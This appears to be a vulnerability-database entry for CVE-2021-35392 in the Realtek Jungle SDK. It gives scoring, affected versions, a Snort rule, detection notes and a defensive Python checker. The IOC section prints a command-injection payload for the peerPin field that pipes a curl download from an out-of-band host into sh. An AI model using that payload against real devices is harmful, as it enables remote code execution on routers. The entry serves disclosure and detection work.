CVE-2021-35392
published 2021-08-16


Priority: P2, 70, high
CVSS 3.1: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Exploit: available
EPSS: 83.15% (99.6th percentile)
Realtek Jungle SDK versions v2.x up to v3.4.14B provide a 'WiFi Simple Config' server that implements both the UPnP and SSDP protocols. The binary is usually named wscd or mini_upnpd and is the successor to miniigd. The server is vulnerable to a heap buffer overflow caused by unsafe construction of SSDP NOTIFY messages from the ST header of received M-SEARCH messages.

Affected

1 range

Vendor    Product                                    Version range    Fixed in
realtek   rtl819x_jungle_software_development_kit    2.0 – 3.4.14b    (not listed)

Detection & IOCs (extracted from sources)

url: /goform/formWsc
path: /goform/formWsc
command: submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
snort: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Realtek SDK - formRebootCheck/formWsc Stack Buffer Overflow Inbound (CVE-2021-35392)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/"; pcre:"/^form(RebootCheck|Wsc)$/R"; http.request_body; content:"submit-url="; fast_pattern; isdataat:2000,relative; reference:url,www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/; reference:cve,2021-35392; classtype:attempted-user; sid:2033837; rev:1; metadata:attack_target Server, created_at 2021_08_30, cve CVE_2021_35392, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, updated_at 2023_04_05, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Exploit targets the 'formWsc' page via HTTP POST to /goform/formWsc; injection occurs in the 'peerPin' parameter. Look for semicolons or shell metacharacters in the peerPin field.
  • The Snort/ET rule triggers on HTTP POST to /goform/formRebootCheck or /goform/formWsc with a request body containing 'submit-url=' and a body length exceeding 2000 bytes (isdataat:2000,relative), indicating an oversized/malicious payload.
  • The vulnerable binaries are named 'wscd' or 'mini_upnpd'. Monitor for these processes handling crafted SSDP NOTIFY/M-SEARCH messages on the network.
  • The heap buffer overflow is triggered via crafted SSDP NOTIFY messages derived from received M-SEARCH ST headers. Monitor SSDP traffic for anomalously large or malformed ST header values.
  • Nuclei template uses an OOB interaction check: a successful exploit causes the target to issue an outbound HTTP request with 'User-Agent: curl', which can be detected on egress or via canary/interactsh infrastructure.
  • The Nuclei template is tagged CVE-2021-35395 (command injection) but is included in sources for CVE-2021-35392 (heap buffer overflow). The two CVEs are distinct vulnerabilities in the same SDK; ensure detections are applied to the correct CVE.
  • The ET Snort rule (sid:2033837) covers both formRebootCheck and formWsc endpoints under CVE-2021-35392, so it may fire on either endpoint; tune accordingly to avoid false positives from legitimate WPS configuration traffic.
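As an added defensive example (not code from this page, from Realtek, or from the ET/Nuclei sources), a Python checker covering the two detection points above: it flags oversized or malformed ST headers in SSDP M-SEARCH datagrams, and shell metacharacters in the peerPin/peerRptPin fields of a POST to /goform/formWsc. The 200-byte ST limit, the allowed-character set and the sample messages are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Assumed thresholds for this example; legitimate ST values ("ssdp:all", "urn:...:1") are short.
ST_MAX_LEN = 200
ST_ALLOWED = re.compile(r"[A-Za-z0-9:._\-]+")
SHELL_META = re.compile(r"[;|&`$]")

def check_ssdp_msearch(datagram: bytes) -> list:
    """Inspect one SSDP datagram; return a list of findings (empty = nothing suspicious)."""
    text = datagram.decode("latin-1")          # never raises; keeps raw bytes visible
    lines = text.split("\r\n")
    if not lines[0].startswith("M-SEARCH "):
        return []                              # only M-SEARCH feeds the NOTIFY builder
    findings = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().upper() == "ST":
            value = value.strip()
            if len(value) > ST_MAX_LEN:
                findings.append("oversized ST header (%d bytes)" % len(value))
            if not ST_ALLOWED.fullmatch(value):
                findings.append("ST header contains unexpected characters")
    return findings

def _form_fields(body: str) -> dict:
    """Split a URL-encoded body on '&' only, so a ';' inside a value is preserved."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return fields

def check_formwsc_post(uri: str, body: str) -> list:
    """Flag shell metacharacters in the PIN fields of a POST to /goform/formWsc."""
    if uri != "/goform/formWsc":
        return []
    findings = []
    fields = _form_fields(body)
    for field in ("peerPin", "peerRptPin"):
        for value in fields.get(field, []):
            if SHELL_META.search(value):
                findings.append("shell metacharacter in %s" % field)
    if len(body) > 2000:                       # mirrors the isdataat:2000 check in the ET rule
        findings.append("oversized request body")
    return findings

# Constructed samples (not captured traffic) to exercise both checks.
BENIGN_MSEARCH = b"M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nMAN: \"ssdp:discover\"\r\nMX: 2\r\nST: ssdp:all\r\n\r\n"
LONG_ST_MSEARCH = b"M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST: " + b"A" * 600 + b"\r\n\r\n"
```

Run it against a UDP/1900 capture and the HTTP request log of the device's web server; a non-empty list is a candidate alert, not a confirmed exploit.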

CVSS provenance

NVD, CVSS v3.1: 7.5 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
NVD, CVSS v2.0: 7.8 HIGH, AV:N/AC:L/Au:N/C:N/I:N/A:C